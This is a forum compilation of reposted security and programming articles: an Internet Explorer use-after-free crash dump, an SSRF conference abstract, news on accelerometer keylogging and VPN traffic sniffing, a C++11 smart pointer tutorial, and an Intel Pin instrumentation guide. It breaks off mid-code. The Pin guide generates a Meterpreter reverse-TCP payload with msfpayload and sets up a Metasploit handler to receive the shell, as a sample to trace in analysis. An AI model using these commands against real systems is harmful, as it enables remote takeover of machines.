2007 DLL info: ProductVersion: 2.05.50727.198 FileVersion: 2.05.50727.198 (QFE.050727-1900) 2010 DLL info: ProductVersion: 2.05.50727.4039 FileVersion: 2.05.50727.4039 (QFE.050727-4000) mshtml.dll ProductVersion: 9.00.8112.16446 FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) FileDescription: Microsoft (R) HTML Viewer 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? 66e13df7 8b0e mov ecx,dword ptr [esi] 66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000) 66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] 66e13e01 ffd0 call eax =end Sursa: Microsoft Internet Explorer SetMouseCapture Use-After-Free ? Packet Storm

Hitb 2013 - V. Vorontsov And A. Golovko - Ssrf Pwns - New Techniques And Stories Description: PRESENTATION ABSTRACT: Server request forgery attacks -- SSRF (Server Side Request Forgery) has been known since 2008, but only recently used in practical information security work. Vulnerabilities of this class gives the attacker the ability to send different requests on behalf of the server, which in turn allows you to bypass various network perimeter restrictions giving the attacker the ability to create requests from the vulnerable servers to the intra/internet. Using various protocols supported by available URI schemas in network libraries (such as cURL, LWP and others), attackers can communicate with local and intranet services. SSRF is used, as a rule, to forge HTTP requests, and SMB requests to carry out attacks like SMB relay. We have expanded the spectrum of SSRF attacks to protocols which are not supported by network libraries by default and also collected all SSRF related info into a cheatsheet. We will show attacks on memcached and PHP FactCGI and will talk about the possibility of working directly with sockets of different applications through SSRF and will present various examples of vulnerabilities and exploitation including new techniques for data retrieving using blind SSRF. Part of this presentation will be dedicated to the story of many SSRF-related exploits of Yandex - a leading Internet company in Russia, which operates one of the most popular search engines. ABOUT VLADIMIR VORONTSOV Vladimir Vorontsov is the founder and lead analyst of ONsec. Vladimir has been engaged in research in the field of web applications security since 2004. He is the CEO and lead expert of the ONsec company as well as the author of numerous researches in the field of web application security. He was awarded by Yandex for winning the "vulnerability search month" contest, by Google for Chrome vulnerabilities, by Trustwave for ModSecurity SQLi Challenge, by 1C Bitrix for competition on proactive defense bypass. He is currently actively engaged in the development of a web application firewall system. ABOUT ALEXANDER GOLOVKO Alexander Golovko is security expert of ONsec since 2009. Alexander specializes in network security and operating systems. Also he is active Debian GNU/Linux maintainer. Alexander together with Vladimir are authors of "SSRF bible. Cheatsheet": http://goo.gl/xSoCq For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - V. Vorontsov And A. Golovko - Ssrf Pwns - New Techniques And Stories

[h=1]Researchers can keylog your PC using your iPhone’s accelerometer[/h] [h=2]An iPhone's accelerometer is good for more than just games, according to …[/h] by Chris Foresman - Oct 19 2011, 8:45pm GTBST Georgia Tech assistant professor of computer science Patrick Traynor. Image courtesy of Georgia Tech Researchers at Georgia Tech and MIT have developed a proof of concept to demonstrate that it is possible to record a computer user's keystrokes using an iPhone 4's accelerometer. The researchers developed a method to accurately translate the vibrations from typing on a keyboard picked up by the device's accelerometer when placed on a desk near a PC. Though they warn that hackers could potentially use their method to eavesdrop on a user's keystrokes, they believe the actual threat is quite low. The method, detailed in a paper titled “(sp)iPhone: Decoding Vibrations From Nearby Keyboards Using Mobile Phone Accelerometers,” works by interpreting pairs of keystrokes in successive order. According to principal researcher Patrick Traynor, assistant professor at Georgia Tech’s School of Computer Science, the method can't reliably pinpoint single keystrokes. But by characterizing the successive strokes as left-right, right-left, left-left, or right-right, and then whether the pair is nearer or further away form the device, the pairs can be statistically analyzed to represent probably letter pairs. Then those pairs can be compared to a dictionary. According to Traynor, the method is 80 percent accurate with a 58,000 word dictionary. Even that accuracy, though, requires thoroughly modern equipment. “We first tried our experiments with an iPhone 3GS, and the results were difficult to read,” Traynor said in a statement. “But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better. We believe that most smartphones made in the past two years are sophisticated enough to launch this attack.” Similar keylogging methods have been developed which use a smartphone's microphone. But malware masquerading as a legitimate app can usually access a smartphone's accelerometer without tripping built-in security features, according to the researchers, which tend to prevent access to a device's sensors without a specific OK from the user. Traynor characterized the likelihood of a smartphone user succumbing to such keyboard eavesdropping as "pretty low." With only 80 percent accuracy, the attack would likely have trouble accurately interpreting usernames or passwords that aren't common dictionary terms. And with an effective range of just three inches, users can easily mitigate any potential threat by keeping their iPhone further away from their keyboard, or off the desk entirely. The paper will be presented Thursday at the currently in progress 18th ACM Conference on Computer and Communications Security in Chicago. Sursa: Researchers can keylog your PC using your iPhone’s accelerometer | Ars Technica

VPN provider 'Proxy.sh' sniffed the traffic of US based server to Catch Hackers Author: Mohit Kumar, The Hacker News - Monday, September 30, 2013 The very first question we always try to figure before choosing a trusted VPN service - Can't a VPN provider just look at my traffic all they want and see what I'm doing? Well, a reputated VPN provider today answers the Question and admitted that they sniffed the traffic on one of its United States-based servers in order to catch an alleged hacker. Proxy.sh, a quality VPN service with no-logging policy, made a surprise announcement: "We are unfortunate to announce that there have been abuses complaints about hacking activities on our U.S. Illinois 1 node. We have been saddened to learn that these actions were harmful to individuals (human beings). As a result, we will open this node again and monitor it with Wireshark for a period of 7 days. Torrentfreak noticed that there was no mention of any legal process, court order, police action or other similar outside influence compelling Proxy.sh to do so. The monitoring was triggered after Proxy.sh received a complaint from someone who claimed they were being harassed by a Proxy.sh user. The VPN provider then allegedly took it upon themselves to try and sort out the problem. "If you are the hacker, please stop your activities and leave our network. You are not welcome here. Our heaven is reserved for those who are not harmful to other human beings. If you do not leave, we will find you and report your activities to NGO and press officers. For all others, the heaven is still safe for you, dear ones. We will completely remove Wireshark after 7 days and restart the node so that everything is erased (RAM-switch). All other nodes are left unaffected by these actions. Update: Wireshark has now been removed/wiped." Later Proxy.sh provided the final statement that, "We have decided to install a monitor on our Illinois 1 node so as to locate the hacker. A few hours after we announced this move to our public, the hacker came to us to apologize. We then completely removed the Wireshark installation." Not all VPN service providers are worth your trust. Some diligently logs your connection times, dates, IP addresses, keep track of how long you're connected, and some even keep an eye on the types of traffic that you send through their networks while you're logged in. The best defense for user data is a quality VPN service, which will send the data through an encrypted tunnel to a secure inhouse server, hiding sensitive information from potential data thieves. Sursa: VPN provider 'Proxy.sh' sniffed the traffic of US based server to Catch Hackers - The Hacker News

[h=1] Web Designer[/h] [h=1]Bring ideas to life across screens[/h] Create engaging, interactive HTML5-based designs and motion graphics that can run on any device. Download Web Designer Beta [h=2]One idea. Any screen.[/h] It doesn’t matter how brilliant your work is if people can’t see it. Now everything you create is accessible on any screen – desktop, tablet or mobile – without compatibility issues. Informatii: http://www.google.com/webdesigner/

[h=1]C++11 Smart Pointers[/h]By syed_babu, 26 Sep 2013 Download Unique Pointer source - 4.54 KB Download Weak Pointer source - 3.95 KB Download Shared Pointer source - 4.31 KB [h=2]Introduction[/h] Ooops. Yet another article on smart pointers of C++11. Nowadays I hear a lot of people talking about the new C++ standard which is nothing but C++0x/C++11. I went through some of the language features of C++11 and it's really an amazing work. I'll focus only on the smart pointers section of C++11. [h=2]Background[/h] [h=3]What are the issues with normal/raw/naked pointers?[/h] Let's go one by one. People refrain from using pointers as they give a lot of issues if not handled properly. That's why newbie programmers dislike pointers. Many issues are involved with pointers like ensuring the lifetime of objects referred to by pointers, dangling references, and memory leaks. Dangling reference is caused if a memory block is pointed by more than one pointer variable and if one of the pointers is released without letting know the other pointer. As all of you know, memory leaks occur when a block of memory is fetched from the heap and is not released back. People say, I write clean and error proof code, why should I use smart pointers? And a programmer asked me, "Hey, here is my code. I fetched the memory from the heap, manipulated it, and after that I released it properly. What is the need of a smart pointer? " void Foo( ){ int* iPtr = new int[5]; //manipulate the memory block . . . delete[ ] iPtr; } The above code works fine and memory is released properly under ideal circumstances. But think of the practical environment of code execution. The instructions between memory allocation and releasing can do nasty things like accessing an invalid memory location, dividing by zero, or say another programmer pitching into your program to fix a bug and adding a premature return statement based on some condition. In all the above cases, you will never reach the point where the memory is released. This is because the first two cases throw an exception whereas the third one is a premature return. So the memory gets leaked while the program is running. The one stop solution for all of the above issues is Smart Pointers [if they are really smart enough]. [h=3]What is a smart pointer?[/h] Smart pointer is a RAII modeled class to manage dynamically allocated memory. It provides all the interfaces provided by normal pointers with a few exceptions. During construction, it owns the memory and releases the same when it goes out of scope. In this way, the programmer is free about managing dynamically allocated memory. C++98 has introduced the first of its kind called auto_ptr. [h=2]auto_ptr[/h] Let's see the use of auto_ptr and how smart it is to resolve the above issues. class Test{ public: Test(int a = 0 ) : m_a(a) { } ~Test( ) { cout<<"Calling destructor"<<endl; } public: int m_a; }; void main( ) { std::auto_ptr<Test> p( new Test(5) ); cout<<p->m_a<<endl; } The above code is smart to release the memory associated with it. What we did is, we fetched a memory block to hold an object of type Test and associated it with auto_ptr p. So when p goes out of scope, the associated memory block is also released. //***************************************************************class Test { public: Test(int a = 0 ) : m_a(a) { } ~Test( ) { cout<<"Calling destructor"<<endl; } public: int m_a; }; //*************************************************************** void Fun( ) { int a = 0, b= 5, c; if( a ==0 ) { throw "Invalid divisor"; } c = b/a; return; } //*************************************************************** void main( ) { try { std::auto_ptr<Test> p( new Test(5) ); Fun( ); cout<<p->m_a<<endl; } catch(...) { cout<<"Something has gone wrong"<<endl; } } In the above case, an exception is thrown but still the pointer is released properly. This is because of stack unwinding which happens when an exception is thrown. As all local objects belonging to the try block are destroyed, p goes out of scope and it releases the associated memory. Issue 1: So far auto_ptr is smart. But it has more fundamental flaws over its smartness. auto_ptr transfers the ownership when it is assigned to another auto_ptr. This is really an issue while passing the auto_ptr between the functions. Say, I have an auto_ptr in Foo( ) and this pointer is passed another function say Fun( ) from Foo. Now once Fun( ) completes its execution, the ownership is not returned back to Foo. //***************************************************************class Test { public: Test(int a = 0 ) : m_a(a) { } ~Test( ) { cout<<"Calling destructor"<<endl; } public: int m_a; }; //*************************************************************** void Fun(auto_ptr<Test> p1 ) { cout<<p1->m_a<<endl; } //*************************************************************** void main( ) { std::auto_ptr<Test> p( new Test(5) ); Fun(p); cout<<p->m_a<<endl; } The above code causes a program crash because of the weird behavior of auto_ptr. What happens is that, p owns a memory block and when Fun is called, p transfers the ownership of its associated memory block to the auto_ptr p1 which is the copy of p. Now p1 owns the memory block which was previously owned by p. So far it is fine. Now fun has completed its execution, and p1 goes out of scope and the memory blocked is released. How about p? p does not own anything, that is why it causes a crash when the next line is executed which accesses p thinking that it owns some resource. Issue 2: Yet another flaw. auto_ptr cannot be used with an array of objects. I mean it cannot be used with the operator new[]. //***************************************************************void main( ) { std::auto_ptr<Test> p(new Test[5]); } The above code gives a runtime error. This is because when auto_ptr goes out of scope, delete is called on the associated memory block. This is fine if auto_ptr owns only a single object. But in the above code, we have created an array of objects on the heap which should be destroyed using delete[ ] and not delete. Issue 3: auto_ptr cannot be used with standard containers like vector, list, map, etc. As auto_ptr is more error prone and it will be deprecated, C++ 11 has come with a new set of smart pointers, each has its own purpose. shared_ptrunique_ptrweak_ptr [h=2]shared_ptr[/h] OK, get ready to enjoy the real smartness. The first of its kind is shared_ptr which has the notion called shared ownership. The goal of shared_ptr is very simple: Multiple shared pointers can refer to a single object and when the last shared pointer goes out of scope, memory is released automatically. Creation: void main( ){ shared_ptr<int> sptr1( new int ); } Make use of the make_shared macro which expedites the creation process. As shared_ptr allocates memory internally, to hold the reference count, make_shared( ) is implemented in a way to do this job effectively. void main( ){ shared_ptr<int> sptr1 = make_shared<int>(100); } The above code creates a shared_ptr which points to a memory block to hold an integer with value 100 and reference count 1. If another shared pointer is created out of sptr1, the reference count goes up to 2. This count is known as strong reference. Apart from this, the shared pointer has another reference count known as weak reference, which will be explained while visiting weak pointers. You can find out the number of shared_ptrs referring to the resource by just getting the reference count by calling use_count( ). And while debugging, you can get it by watching the stong_ref of the shared_ptr. Destruction: shared_ptr releases the associated resource by calling delete by default. If the user needs a different destruction policy, he/she is free to specify the same while constructing the shared_ptr. The following code is a source of trouble due to the default destruction policy: class Test{ public: Test(int a = 0 ) : m_a(a) { } ~Test( ) { cout<<"Calling destructor"<<endl; } public: int m_a; }; void main( ) { shared_ptr<Test> sptr1( new Test[5] ); } Because shared_ptr owns an array of objects, it calls delete when it goes out of scope. Actually, delete[ ] should have been called to destroy the array. The user can specify the custom deallocator by a callable object, i.e., a function, lambda expression, function object. void main( ){ shared_ptr<Test> sptr1( new Test[5], [ ](Test* p) { delete[ ] p; } ); } The above code works fine as we have specified the destruction should happen via delete[]. [h=4]Interface[/h] shared_ptr provides dereferencing operators *, -> like a normal pointer provides. Apart from that it provides some more important interfaces like: get( ) : To get the resource associated with the shared_ptr.reset( ) : To yield the ownership of the associated memory block. If this is the last shared_ptr owning the resource, then the resource is released automatically.unique: To know whether the resource is managed by only this shared_ptr instance.operator bool: To check whether the shared_ptr owns a memory block or not. Can be used with an if condition. OK, that is all about shared_ptrs. But shared_ptrs too have a few issues:. Issues: If a memory is block is associated with shared_ptrs belonging to a different group, then there is an error. All shared_ptrs sharing the same reference count belong to a group. Let's see an example. void main( ){ shared_ptr<int> sptr1( new int ); shared_ptr<int> sptr2 = sptr1; shared_ptr<int> sptr3; sptr3 = sptr2; } The below table gives you the reference count values for the above code. All shared_ptrs share the same reference count hence belonging to the same group. The above code is fine. Let's see another piece of code. void main( ){ int* p = new int; shared_ptr<int> sptr1( p); shared_ptr<int> sptr2( p ); } There is another issue involved with creating a shared pointer from a naked pointer. In the above code, consider that only one shared pointer is created using p and the code works fine. Consider by mistake if a programmer deletes the naked pointer p before the scope of the shared pointer ends. Oooppss!!! Yet another crash..Cyclic Reference: Resources are not released properly if a cyclic reference of shared pointers are involved. Consider the following piece of code. class B;class A { public: A( ) : m_sptrB(nullptr) { }; ~A( ) { cout<<" A is destroyed"<<endl; } shared_ptr<B> m_sptrB; }; class B { public: B( ) : m_sptrA(nullptr) { }; ~B( ) { cout<<" B is destroyed"<<endl; } shared_ptr<A> m_sptrA; }; //*********************************************************** void main( ) { shared_ptr<B> sptrB( new B ); shared_ptr<A> sptrA( new A ); sptrB->m_sptrA = sptrA; sptrA->m_sptrB = sptrB; } The above code has cyclic reference. I mean class A holds a shared pointer to B and class B holds a shared pointer to A. In this case, the resource associated with both sptrA and sptrB are not released. Refer to the below table. Reference counts for both sptrA and sptrB go down to 1 when they go out of scope and hence the resources are not released!!!!! To resolve the cyclic reference, C++ provides another smart pointer class called weak_ptr. [h=2]Weak_Ptr[/h] A weak pointer provides sharing semantics and not owning semantics. This means a weak pointer can share a resource held by a shared_ptr. So to create a weak pointer, some body should already own the resource which is nothing but a shared pointer. A weak pointer does not allow normal interfaces supported by a pointer, like calling *, ->. Because it is not the owner of the resource and hence it does not give any chance for the programmer to mishandle it. Then how do we make use of a weak pointer? The answer is to create a shared_ptr out of a weak _ptr and use it. Because this makes sure that the resource won't be destroyed while using by incrementing the strong reference count. As the reference count is incremented, it is sure that the count will be at least 1 till you complete using the shared_ptr created out of the weak_ptr. Otherwise what may happen is while using the weak_ptr, the resource held by the shared_ptr goes out of scope and the memory is released which creates chaos. [h=4]Creation[/h] A weak pointer constructor takes a shared pointer as one of its parameters. Creating a weak pointer out of a shared pointer increases the weak reference counter of the shared pointer. This means that the shared pointer shares it resource with another pointer. But this counter is not considered to release the resource when the shared pointer goes out of scope. I mean if the strong reference of the shared pointer goes to 0, then the resource is released irrespective of the weak reference value. void main( ){ shared_ptr<Test> sptr( new Test ); weak_ptr<Test> wptr( sptr ); weak_ptr<Test> wptr1 = wptr; } We can watch the reference counters of the shared/weak pointer. Assigning a weak pointer to another weak pointer increases the weak reference count. So what happens when a weak pointer points to a resource held by the shared pointer and the shared pointer destroys the associated resource when it goes out of scope? The weak pointer gets expired. How to check whether the weak pointer is pointing to a valid resource? There are two ways: Call the use_count( ) method to know the count. Note that this method returns the strong reference count and not the weak reference.Call the expired( ) method. This is faster than calling use_count( ). To get a shared_ptr from a weak_ptr call lock( ) or directly casting the weak_ptr to shared_ptr. void main( ){ shared_ptr<Test> sptr( new Test ); weak_ptr<Test> wptr( sptr ); shared_ptr<Test> sptr2 = wptr.lock( ); } Getting the shared_ptr from the weak_ptr increases the strong reference as said earlier. Now let's see how the cyclic reference issue is resolved using the weak_ptr. class B;class A { public: A( ) : m_a(5) { }; ~A( ) { cout<<" A is destroyed"<<endl; } void PrintSpB( ); weak_ptr<B> m_sptrB; int m_a; }; class B { public: B( ) : m_b(10) { }; ~B( ) { cout<<" B is destroyed"<<endl; } weak_ptr<A> m_sptrA; int m_b; }; void A::PrintSpB( ) { if( !m_sptrB.expired() ) { cout<< m_sptrB.lock( )->m_b<<endl; } } void main( ) { shared_ptr<B> sptrB( new B ); shared_ptr<A> sptrA( new A ); sptrB->m_sptrA = sptrA; sptrA->m_sptrB = sptrB; sptrA->PrintSpB( ); } [h=2]Unique_ptr[/h] This is almost a kind of replacement to the error prone auto_ptr. unique_ptr follows the exclusive ownership semantics, i.e., at any point of time, the resource is owned by only one unique_ptr. When auto_ptr goes out of scope, the resource is released. If the resource is overwritten by some other resource, the previously owned resource is released. So it guarantees that the associated resource is released always. [h=4]Creation[/h] unique_ptr is created in the same way as shared_ptr except it has an additional facility for an array of objects. Collapse | Copy Code unique_ptr<int> uptr( new int ); The unique_ptr class provides the specialization to create an array of objects which calls delete[ ] instead of delete when the pointer goes out of scope. The array of objects can be specified as a part of the template parameter while creating the unique_ptr. In this way, the programmer does not have to provide a custom deallocator, as unique_ptr does it. Collapse | Copy Code unique_ptr<int[ ]> uptr( new int[5] ); Ownership of the resource can be transferred from one unique_ptr to another by assigning it. Keep in mind that unique_ptr does not provide you copy semantics [copy assignment and copy construction is not possible] but move semantics. In the above case, if upt3 and uptr5 owns some resource already, then it will be destroyed properly before owning a new resource. [h=4]Interface[/h] The interface that unique_ptr provides is very similar to the ordinary pointer but no pointer arithmetic is allowed. unique_ptr provides a function called release which yields the ownership. The difference between release( ) and reset( ), is release just yields the ownership and does not destroy the resource whereas reset destroys the resource. [h=3]Which one to use?[/h] It purely depends upon how you want to own a resource. If shared ownership is needed then go for shared_ptr, otherwise unique_ptr. Apart from that, shared_ptr is a bit heavier than unique_ptr because internally it allocates memory to do a lot of book keeping like strong reference, weak reference, etc. But unique_ptr does not need these counters as it is the only owner for the resource. [h=2]Using the code[/h] I have attached the worked out code to explain the details of each pointer. I have added enough comments to each instruction. Ping me back if you find any problems with the code. The weak pointer example demonstrates the problems with shared pointers in the case of cyclic reference and how the weak pointer resolves it. [h=2]History[/h] This is the first version of the article. I'll keep you updated based on feedback and comments. [h=2]License[/h] This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) [h=2]About the Author[/h] syed_babu Software Developer India I'm working as Senior software Engineer since 7 years and interested in MFC and COM programming. Sursa: C++11 Smart Pointers - CodeProject

Pin: Dynamic Binary Instrumentation Framework Dejan Lukan September 30, 2013 Introduction Pin is a DBI framework for IA-32 and x86-64 architectures, which can be used for dynamic analysis of the binary program at run time. When using Pin framework to build tools, you’re actually creating pintools; you can think of Pin as an abstraction layer that abstract away the underlying details of dynamic analysis [1]. Pin does that by readings the process’s code, saving it into memory and inserting its own instructions while generating the code. Therefore, Pin then executes the generated code, which will execute the code of the main program plus the additional inserted instructions. Pin can be used to insert C/C++ code in arbitrary places in the dynamically executed executable; you can either start a new process directly from pintool (our own program that uses Pin framework) or attach to an already running process. When developing the pintool, you’re actually telling Pin how to generate the code from the main executable: you’re influencing the code addition/modification processes. When you run a program within a pintool, it will stop the program execution at first instruction and modify the code generation process. Then it will generate the code it will later execute by using one of the following modes [2]: Trace Instrumentation: pintool processes one trace at a time by starting from the current instruction and ending with an unconditional branch (including calls and returns), which can be completed by using the TRACE_AddInstrumentFunction API call. Instruction Instrumentation: pintool processes one instruction at a time, which can be completed by using the INS_AddInstrumentFunction API call. Image Instrumentation: pintool processes an entire image where Pin can iterate over program sections, routines in a section or instructions in a routine. You can insert additional instructions before/after the routine is executed or before/after an instruction is executed. Here you have to use IMG_AddInstrumentFunction API call. Routine Instrumentation: pintool processes one routine where Pin can iterate over instructions of a routine. Additional instructions can be inserted before/after routine execution or before/after instruction execution. Here you have to use RTN_AddInstrumentFunction API call. There are a couple of callback functions that you can use with the pin framework and are presented below: TRACE_AddInstrumentFunction: directly corresponds with the Trace Instrumentation Mode INC_AddInstrumentFunction: directly corresponds with the Instruction Instrumentation Mode IMG_AddInstrumentFunction: directly corresponds with the Image Instrumentation Mode RTN_AddInstrumentFunction: directly corresponds with the Routine Instrumentation Mode PIN_AddFiniFunction: PIN_AddDetachFunction The callback functions mentioned above have the prototypes presented below, where the fun argument repesents a function to be called and the val represents the parameter to be passed to the fun function [2]: INS_AddInstrumentFunction (INSCALLBACK fun, VOID *val) TRACE_AddInstrumentFunction (TRACECALLBACK fun, VOID *val) RTN_AddInstrumentFunction (RTNCALLBACK fun, VOID *val) IMG_AddInstrumentFunction (IMGCALLBACK fun, VOID *val) PIN_AddFiniFunction (FINICALLBACK fun, VOID *val) PIN_AddDetachFunction (DETACHCALLBACK fun, VOID *val) Since the val parameter is a pointer to VOID, you can basically pass any structure to the callback function. Some of the examples that you can pass to the callback functions are presented below (summarized after [2]): Instruction Pointer Value of Register Current value of Registers Effective Address of Memory Operations Constants Number of bytes of Read Memory Number of bytes of Written Memory Function Result … The function abbreviations are as follows, which is provided for clarity of the discussion: IMG : image SEC : section in an image RTN : routine in a section INS : instruction in a routine SYM : symbol object There are also other various functions you can use, where some of them are presented below: PIN_InitSymbols: initialize the symbols which will be used by the Pin framework. INS_Delete: remove the instruction. INS_RewriteMemoryOperand: change the memory value accessed by the instruction. PIN_AddSyscallEntryFunction: do some action when system call occurs: you can use this to print which system call was called and all of the parameters passed to the system call. PIN_AddSyscallExitFunction: do some action when exiting from system call: you can use this to print the return value of a system call. PIN_GetSyscallArgument: you can call this function to get the arguments of system call; the important thing to note here is that you must pass it the SYSCALL_STANDARD object, which is used when declaring where the arguments of the system call are stored. Note that depending on the calling convention used, they can be stored in registers or on stack [4]. The Inscount0 Example You can download Pin from here and select the appropriate version. I downloaded the pin-2.12-58423-gcc.4.4.7-linux.tar.gz file and extracted its contents. After that I changed the directory to source/tools/ManualExamples/ and built the inscount0 example as presented in [2]. For reference, the executed commands can be seen below. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]# tar xvzf pin-2.12-58423-gcc.4.4.7-linux.tar.gz # cd pin-2.12-58423-gcc.4.4.7-linux/source/tools/ManualExamples/ # make inscount0.test [/TD] [/TR] [/TABLE] Now the inscount0 example is built and the inscount0.so is stored in the newly created obj-intel64/ folder. Now you can run the pin command by passing it the path to the inscount.so. Let’s now run the /bin/ls command with pin as presented below. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]# pin -t obj-intel64/inscount0.so -- /bin/ls [/TD] [/TR] [/TABLE] The inscount0 example will count the number of executed instructions by increasing the counter by 1 before every executed instruction. Once the program exists, pin will save the results in inscount.out file, which will contain the number of executed instructions; in our case there youre 563175 executed instructions as can be seen below. [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]# cat inscount.out Count 563175 [/TD] [/TR] [/TABLE] Let’s now present the actual program that was used to calculate the number of executed instructions, which can be seen below. #include#include #include "pin.H" ofstream OutFile; // The running count of instructions is kept here // make it static to help the compiler optimize docount static UINT64 icount = 0; // This function is called before every instruction is executed VOID docount() { icount++; } // Pin calls this function every time a new instruction is encountered VOID Instruction(INS ins, VOID *v) { // Insert a call to docount before every instruction, no arguments are passed INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)docount, IARG_END); } KNOB KnobOutputFile(KNOB_MODE_WRITEONCE, "pintool", "o", "inscount.out", "specify output file name"); // This function is called when the application exits VOID Fini(INT32 code, VOID *v) { // Write to a file since cout and cerr maybe closed by the application OutFile.setf(ios::showbase); OutFile << "Count " << icount << endl; OutFile.close(); } /* ===================================================================== */ /* Print Help Message */ /* ===================================================================== */ INT32 Usage() { cerr << "This tool counts the number of dynamic instructions executed" << endl; cerr << endl << KNOB_BASE::StringKnobSummary() << endl; return -1; } /* ===================================================================== */ /* Main */ /* ===================================================================== */ /* argc, argv are the entire command line: pin -t -- ... */ /* ===================================================================== */ int main(int argc, char * argv[]) { // Initialize pin if (PIN_Init(argc, argv)) return Usage(); OutFile.open(KnobOutputFile.Value().c_str()); // Register Instruction to be called to instrument instructions INS_AddInstrumentFunction(Instruction, 0); // Register Fini to be called when the application exits PIN_AddFiniFunction(Fini, 0); // Start the program, never returns PIN_StartProgram(); return 0; } In the beginning of the code you have the icount variable that holds the number of executed instruction; note that the variable is 64-bit, which means it can present the number from 1 – 2^64 that is needed to present the instruction count of longer programs where regular 32-bit integers are not enough. The docount() function increases the icount variable by 1 when each instruction is executed. You can see what the program does if you look at the main function where you’re first initializing the pin. After that you’re registering the function to be used before each and every instruction is executed: the Instruction function is called every time. The Instruction function calls INS_InsertCall to insert additional call to docount() function before executing each instruction. Additionally, in the main function, you also have the PIN_AddFiniFunction, which registers the function that will be called when the application exits: the Fini function. That function writes the number of executed instructions into the inscount.out file. At the end of the main() function you must also call the PIN_StartProgram to actually start the program and also inject calls to docount() function before executing each and every instruction. Now let’s also look at how you can compile the same example under Windows, because you’ll need it later on. First, you must install Visual C++, which is a requirement if you don’t want to bother ourselves with Mingw/Cygwin, so you should install that; I won’t cover it here, since it should be fairly self-explanatory. After the installation of Visual C++, you need to open Visual Studio project file under MyPinTool directory under extracted pin archive as shown below. By using this you can easily create a new tool with Visual Studio. Once opened, you can change the MyPinTool.cpp source code and copy the inscount0 example in there. The build process should succeed without a problem, which should give is MyPinTool.dll library, which you can use for counting the number of instructions of some program. I copied the DLL into the C:\pin\ directory where the pin.exe is also located. Then I executed the “pin.exe -t MyPinTool.dll – C:\Windows\System32\calc.exe” command, which opens a new instance of calculator as shown below. After you calculate some equations with calculator, you can close it and pin.exe will also be automatically closed. If you remember correctly from the previous example, the number of executed instructions should be written to the inscount0.txt file. Below you can see that 133875503 instructions youre executed during the calculator execution, which seems quite a lot, but computers can handle that without a problem. The Meterpreter Example In this example, you’ll first create Meterpreter executable that can connect back to our machine and launch it on Windows operating system to prove that it works. Then, you’ll download pin framework for Windows and use it to start the Meterpreter executable. The point of the exercise is printing all the shared libraries the Meterpreter uses while connecting back to our computer. To create the Meterpreter executable, you can use the msfpayload command as presented below: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > meterpreter.exe Created by msfpayload (Penetration Testing Software | Metasploit). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"} [/TD] [/TR] [/TABLE] To test whether that executable connects back to our Linux machine, you first have to start a handler with the “msfconsole -r meterpreter.rb” command, where the meterpreter.rb is outlined below. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 4444 set LHOST 0.0.0.0 set ExitOnSession false exploit -j -z [/TD] [/TR] [/TABLE] After the handler has been started, a new port 4444 should be open on our Linux machine, waiting for Meterpreter executable to connect. When the Meterpreter executable connects to the handler, a new session is spawned, which you can enter by issuing “session -i 1? command. Below you entered the newly spawned Meterpreter session and executed the sysinfo command to prove that Meterpreter session is working: > sysinfo Computer : ADMIN-PC OS : Windows 7 (Build 7600). Architecture : x86 System Language : en_US Meterpreter : x86/win32 So far, you’ve established only that Meterpreter indeed connects back to the handler, but you don’t have a clue which system calls are actually being called. In order to print each and every system call used by Meterpreter, you need to create a pintool that calls the PIN_AddSyscallEntryFunction/PIN_AddSyscallExitFunction, which have the following syntax: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]PIN_AddSyscallEntryFunction(SYSCALL_ENTRY_CALLBACK fun, VOID *val); PIN_AddSyscallExitFunction(SYSCALL_EXIT_CALLBACK fun, VOID *val); [/TD] [/TR] [/TABLE] Notice that you’re passing the parameter fun into the above functions, which is actually the function that is going to be called before and after the system call is executed. Let’s first count the number of instructions executed when meterpreter.exe gets executed. If you start meterpreter.exe with pin, wait for it to connect back to create a reverse shell and then kill the meterpreter.exe from task manager, the inscount.out won’t contain the number of instructions executed, because the program hasn’t existed cleanly. You can see that on the picture below, where the inscount.out file doesn’t contain anything. After that I added some code to be able to monitor system calls. I’ve added the PIN_AddSyscallEntryFunction and PIN_AddSyscallExitFunction function calls, which instruct PIN to call the specified functions before and after entering the system call. The whole code can be seen below, where you can see exactly how you’re setting the SyscallEntry and SyscallExit functions. In SyscallEntry function you’re saving the function name and the first tree arguments into the output file and in SyscallExit, you’re saving the syscall’s return value. Note that the PIN_GetSyscallArgument automatically knows whether the argument is stored in register or on stack, so you don’t have to worry about that; it’s abstracted away by the PIN framework. #include#include #include "pin.H" ofstream out; VOID SyscallEntry(THREADID tid, CONTEXT *ctx, SYSCALL_STANDARD std, VOID *v) { printf("System call: %d\n", PIN_GetSyscallNumber(ctx, std)); ADDRINT num = PIN_GetSyscallNumber(ctx, std); ADDRINT arg1 = PIN_GetSyscallArgument(ctx, std, 0); ADDRINT arg2 = PIN_GetSyscallArgument(ctx, std, 0); ADDRINT arg3 = PIN_GetSyscallArgument(ctx, std, 0); out << " Syscall Number: " << num << "(" << arg1 << ", " << arg2 << ", " << arg3 << ")" << endl; } VOID SyscallExit(THREADID tid, CONTEXT *ctx, 